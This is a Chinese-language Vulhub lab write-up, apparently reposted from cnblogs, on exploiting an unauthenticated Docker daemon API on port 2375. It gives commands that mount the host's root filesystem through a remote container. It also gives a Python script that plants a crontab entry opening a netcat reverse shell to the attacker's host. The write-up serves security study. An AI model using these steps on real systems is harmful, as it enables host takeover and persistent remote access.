标签：Vulhub 容器 etc ip 漏洞 2375 Docker docker

Vulhub 漏洞学习之：Docker

• Vulhub 漏洞学习之：Docker
• 1 docker daemon api 未授权访问漏洞
  • 1.1 漏洞利用过程

1 docker daemon api 未授权访问漏洞

1. 存在可以启动的容器
2. docker 守护进程监听在0.0.0.0，外网可访问
3. 没有使用iptable等限制可连接的来源ip。

参考链接：

• [http://www.loner.fm/drops/#!/drops/1203.新姿势之Docker Remote API未授权访问漏洞分析和利用](http://www.loner.fm/drops/#!/drops/1203.新姿势之Docker Remote API未授权访问漏洞分析和利用)

1.1 漏洞利用过程

1. 访问your-ip:2375/version验证是否搭建成功

   

2. 远程对被攻击主机的docker容器进行操作

   # 查看目标主机的主容器
   docker -H tcp://10.5.7.211:2375 images
   
   # 远程启动被攻击主机的docker容器，并挂载宿主机的根目录
   docker -H tcp://10.5.7.211:2375 run -it -v /:/mnt imagelD /bin/bash
   
   # 可对宿主机进行远程文件操作
   cd /mnt
   

3. 启动一个容器，并将宿主机的/etc目录挂载到容器中，便可以任意读写文件了。

   import docker
   
   client = docker.DockerClient(base_url='http://your-ip:2375/')
   data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
   

4. 将命令写入crontab配置文件，进行反弹shell。

标签：Vulhub,容器,etc,ip,漏洞,2375,Docker,docker
来源： https://www.cnblogs.com/f-carey/p/15935432.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。